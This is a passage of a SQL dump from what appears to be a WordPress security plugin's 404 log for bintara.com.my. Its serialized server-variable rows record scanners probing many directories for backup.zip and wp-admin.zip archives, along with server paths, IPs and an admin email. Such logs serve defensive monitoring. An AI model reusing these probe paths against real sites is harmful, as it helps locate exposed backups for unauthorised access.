Safari/537.36\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:36:\"http://bintara.com.my/wp2/backup.zip\";s:19:\"REDIRECT_SCRIPT_URL\";s:15:\"/wp2/backup.zip\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XY5NaaTYgRwQdJ@9I7BUPwAAAJc\";s:12:\"REDIRECT_URL\";s:15:\"/wp2/backup.zip\";s:11:\"REMOTE_ADDR\";s:11:\"66.84.10.30\";s:11:\"REMOTE_PORT\";s:5:\"45292\";s:14:\"REQUEST_METHOD\";s:4:\"HEAD\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:36:\"http://bintara.com.my/wp2/backup.zip\";s:10:\"SCRIPT_URL\";s:15:\"/wp2/backup.zip\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XY5NaaTYgRwQdJ@9I7BUPwAAAJc\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569607019.0058\";s:12:\"REQUEST_TIME\";s:10:\"1569607019\";}}','notice','2019-09-27 17:57:39','2019-09-27 17:57:02',35126352,36929392,'http://bintara.com.my/wp2/backup.zip',1,0,'66.84.10.30'),(27222,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:36:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:14:\"/v1/backup.zip\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:20:\"en-us;q=0.7,en;q=0.3\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:35:\"http://bintara.com.my/v1/backup.zip\";s:19:\"REDIRECT_SCRIPT_URL\";s:14:\"/v1/backup.zip\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XY5NaaTYgRwQdJ@9I7BURQAAAI0\";s:12:\"REDIRECT_URL\";s:14:\"/v1/backup.zip\";s:11:\"REMOTE_ADDR\";s:11:\"66.84.10.30\";s:11:\"REMOTE_PORT\";s:5:\"45316\";s:14:\"REQUEST_METHOD\";s:4:\"HEAD\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:35:\"http://bintara.com.my/v1/backup.zip\";s:10:\"SCRIPT_URL\";s:14:\"/v1/backup.zip\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XY5NaaTYgRwQdJ@9I7BURQAAAI0\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569607019.0111\";s:12:\"REQUEST_TIME\";s:10:\"1569607019\";}}','notice','2019-09-27 17:57:39','2019-09-27 17:57:02',35124384,36931240,'http://bintara.com.my/v1/backup.zip',1,0,'66.84.10.30'),(27223,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:36:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:14:\"/v2/backup.zip\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:20:\"en-us;q=0.7,en;q=0.3\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:35:\"http://bintara.com.my/v2/backup.zip\";s:19:\"REDIRECT_SCRIPT_URL\";s:14:\"/v2/backup.zip\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XY5NaZB8LtYU@MYZI46mLQAAAQI\";s:12:\"REDIRECT_URL\";s:14:\"/v2/backup.zip\";s:11:\"REMOTE_ADDR\";s:11:\"66.84.10.30\";s:11:\"REMOTE_PORT\";s:5:\"45306\";s:14:\"REQUEST_METHOD\";s:4:\"HEAD\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:35:\"http://bintara.com.my/v2/backup.zip\";s:10:\"SCRIPT_URL\";s:14:\"/v2/backup.zip\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XY5NaZB8LtYU@MYZI46mLQAAAQI\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569607017.7756\";s:12:\"REQUEST_TIME\";s:10:\"1569607017\";}}','notice','2019-09-27 17:57:39','2019-09-27 17:56:59',35127152,36932600,'http://bintara.com.my/v2/backup.zip',1,0,'66.84.10.30'),(27224,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:36:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:15:\"/dev/backup.zip\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:20:\"en-us;q=0.7,en;q=0.3\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:36:\"http://bintara.com.my/dev/backup.zip\";s:19:\"REDIRECT_SCRIPT_URL\";s:15:\"/dev/backup.zip\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XY5NaaTYgRwQdJ@9I7BUSAAAAJU\";s:12:\"REDIRECT_URL\";s:15:\"/dev/backup.zip\";s:11:\"REMOTE_ADDR\";s:11:\"66.84.10.30\";s:11:\"REMOTE_PORT\";s:5:\"45296\";s:14:\"REQUEST_METHOD\";s:4:\"HEAD\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:36:\"http://bintara.com.my/dev/backup.zip\";s:10:\"SCRIPT_URL\";s:15:\"/dev/backup.zip\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XY5NaaTYgRwQdJ@9I7BUSAAAAJU\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569607018.9925\";s:12:\"REQUEST_TIME\";s:10:\"1569607018\";}}','notice','2019-09-27 17:57:45','2019-09-27 17:57:01',35126352,36929392,'http://bintara.com.my/dev/backup.zip',1,0,'66.84.10.30'),(27225,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:36:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:16:\"/test/backup.zip\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:20:\"en-us;q=0.7,en;q=0.3\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:37:\"http://bintara.com.my/test/backup.zip\";s:19:\"REDIRECT_SCRIPT_URL\";s:16:\"/test/backup.zip\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XY5NaaTYgRwQdJ@9I7BUQQAAAIE\";s:12:\"REDIRECT_URL\";s:16:\"/test/backup.zip\";s:11:\"REMOTE_ADDR\";s:11:\"66.84.10.30\";s:11:\"REMOTE_PORT\";s:5:\"45300\";s:14:\"REQUEST_METHOD\";s:4:\"HEAD\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:37:\"http://bintara.com.my/test/backup.zip\";s:10:\"SCRIPT_URL\";s:16:\"/test/backup.zip\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XY5NaaTYgRwQdJ@9I7BUQQAAAIE\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569607018.9979\";s:12:\"REQUEST_TIME\";s:10:\"1569607018\";}}','notice','2019-09-27 17:57:45','2019-09-27 17:57:02',35125888,36925256,'http://bintara.com.my/test/backup.zip',1,0,'66.84.10.30'),(27226,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:36:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/portal/backup.zip\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:20:\"en-us;q=0.7,en;q=0.3\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:39:\"http://bintara.com.my/portal/backup.zip\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/portal/backup.zip\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XY5NaaTYgRwQdJ@9I7BUPQAAAJE\";s:12:\"REDIRECT_URL\";s:18:\"/portal/backup.zip\";s:11:\"REMOTE_ADDR\";s:11:\"66.84.10.30\";s:11:\"REMOTE_PORT\";s:5:\"45322\";s:14:\"REQUEST_METHOD\";s:4:\"HEAD\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:39:\"http://bintara.com.my/portal/backup.zip\";s:10:\"SCRIPT_URL\";s:18:\"/portal/backup.zip\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XY5NaaTYgRwQdJ@9I7BUPQAAAJE\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569607019.0022\";s:12:\"REQUEST_TIME\";s:10:\"1569607019\";}}','notice','2019-09-27 17:57:45','2019-09-27 17:57:02',35129600,36940088,'http://bintara.com.my/portal/backup.zip',1,0,'66.84.10.30'),(27227,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:36:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:16:\"/beta/backup.zip\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:20:\"en-us;q=0.7,en;q=0.3\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:37:\"http://bintara.com.my/beta/backup.zip\";s:19:\"REDIRECT_SCRIPT_URL\";s:16:\"/beta/backup.zip\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XY5NaaTYgRwQdJ@9I7BURAAAAI4\";s:12:\"REDIRECT_URL\";s:16:\"/beta/backup.zip\";s:11:\"REMOTE_ADDR\";s:11:\"66.84.10.30\";s:11:\"REMOTE_PORT\";s:5:\"45318\";s:14:\"REQUEST_METHOD\";s:4:\"HEAD\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:37:\"http://bintara.com.my/beta/backup.zip\";s:10:\"SCRIPT_URL\";s:16:\"/beta/backup.zip\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XY5NaaTYgRwQdJ@9I7BURAAAAI4\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569607019.0016\";s:12:\"REQUEST_TIME\";s:10:\"1569607019\";}}','notice','2019-09-27 17:57:45','2019-09-27 17:57:02',35125888,36925256,'http://bintara.com.my/beta/backup.zip',1,0,'66.84.10.30'),(27228,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:36:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:16:\"/blog/backup.zip\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:20:\"en-us;q=0.7,en;q=0.3\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:37:\"http://bintara.com.my/blog/backup.zip\";s:19:\"REDIRECT_SCRIPT_URL\";s:16:\"/blog/backup.zip\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XY5NaaTYgRwQdJ@9I7BUPgAAAIs\";s:12:\"REDIRECT_URL\";s:16:\"/blog/backup.zip\";s:11:\"REMOTE_ADDR\";s:11:\"66.84.10.30\";s:11:\"REMOTE_PORT\";s:5:\"45294\";s:14:\"REQUEST_METHOD\";s:4:\"HEAD\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:37:\"http://bintara.com.my/blog/backup.zip\";s:10:\"SCRIPT_URL\";s:16:\"/blog/backup.zip\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XY5NaaTYgRwQdJ@9I7BUPgAAAIs\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569607018.9881\";s:12:\"REQUEST_TIME\";s:10:\"1569607018\";}}','notice','2019-09-27 17:57:45','2019-09-27 17:57:02',35125888,36925256,'http://bintara.com.my/blog/backup.zip',1,0,'66.84.10.30'),(27229,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:82:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:21:\"/website/wp-admin.zip\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:6:\"H2PUSH\";s:3:\"off\";s:7:\"H2_PUSH\";s:3:\"off\";s:9:\"H2_PUSHED\";s:0:\"\";s:12:\"H2_PUSHED_ON\";s:0:\"\";s:12:\"H2_STREAM_ID\";s:1:\"1\";s:13:\"H2_STREAM_TAG\";s:5:\"320-1\";s:5:\"HTTP2\";s:2:\"on\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:20:\"en-us;q=0.7,en;q=0.3\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_H2PUSH\";s:3:\"off\";s:16:\"REDIRECT_H2_PUSH\";s:3:\"off\";s:18:\"REDIRECT_H2_PUSHED\";s:0:\"\";s:21:\"REDIRECT_H2_PUSHED_ON\";s:0:\"\";s:21:\"REDIRECT_H2_STREAM_ID\";s:1:\"1\";s:22:\"REDIRECT_H2_STREAM_TAG\";s:5:\"320-1\";s:14:\"REDIRECT_HTTP2\";s:2:\"on\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:24:\"REDIRECT_REDIRECT_H2PUSH\";s:3:\"off\";s:25:\"REDIRECT_REDIRECT_H2_PUSH\";s:3:\"off\";s:27:\"REDIRECT_REDIRECT_H2_PUSHED\";s:0:\"\";s:30:\"REDIRECT_REDIRECT_H2_PUSHED_ON\";s:0:\"\";s:30:\"REDIRECT_REDIRECT_H2_STREAM_ID\";s:1:\"1\";s:31:\"REDIRECT_REDIRECT_H2_STREAM_TAG\";s:5:\"320-1\";s:23:\"REDIRECT_REDIRECT_HTTP2\";s:2:\"on\";s:23:\"REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:33:\"REDIRECT_REDIRECT_REDIRECT_H2PUSH\";s:3:\"off\";s:34:\"REDIRECT_REDIRECT_REDIRECT_H2_PUSH\";s:3:\"off\";s:36:\"REDIRECT_REDIRECT_REDIRECT_H2_PUSHED\";s:0:\"\";s:39:\"REDIRECT_REDIRECT_REDIRECT_H2_PUSHED_ON\";s:0:\"\";s:39:\"REDIRECT_REDIRECT_REDIRECT_H2_STREAM_ID\";s:1:\"1\";s:40:\"REDIRECT_REDIRECT_REDIRECT_H2_STREAM_TAG\";s:5:\"320-1\";s:32:\"REDIRECT_REDIRECT_REDIRECT_HTTP2\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:37:\"REDIRECT_REDIRECT_REDIRECT_SCRIPT_URI\";s:43:\"https://bintara.com.my/website/wp-admin.zip\";s:37:\"REDIRECT_REDIRECT_REDIRECT_SCRIPT_URL\";s:21:\"/website/wp-admin.zip\";s:38:\"REDIRECT_REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:33:\"REDIRECT_REDIRECT_REDIRECT_STATUS\";s:3:\"200\";s:36:\"REDIRECT_REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XY5N6XKlfXTtZ68oOVBX2AAAAAE\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:4:\"HEAD\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:43:\"https://bintara.com.my/website/wp-admin.zip\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:21:\"/website/wp-admin.zip\";s:29:\"REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"404\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XY5N6XKlfXTtZ68oOVBX2AAAAAE\";s:19:\"REDIRECT_SCRIPT_URI\";s:43:\"https://bintara.com.my/website/wp-admin.zip\";s:19:\"REDIRECT_SCRIPT_URL\";s:21:\"/website/wp-admin.zip\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"404\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XY5N6XKlfXTtZ68oOVBX2AAAAAE\";s:12:\"REDIRECT_URL\";s:10:\"/404.shtml\";s:11:\"REMOTE_ADDR\";s:12:\"68.66.224.26\";s:11:\"REMOTE_PORT\";s:5:\"56348\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:43:\"https://bintara.com.my/website/wp-admin.zip\";s:10:\"SCRIPT_URL\";s:21:\"/website/wp-admin.zip\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/2.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XY5N6XKlfXTtZ68oOVBX2AAAAAE\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1569607146.337\";s:12:\"REQUEST_TIME\";s:10:\"1569607146\";}}','notice','2019-09-27 17:59:08','2019-09-27 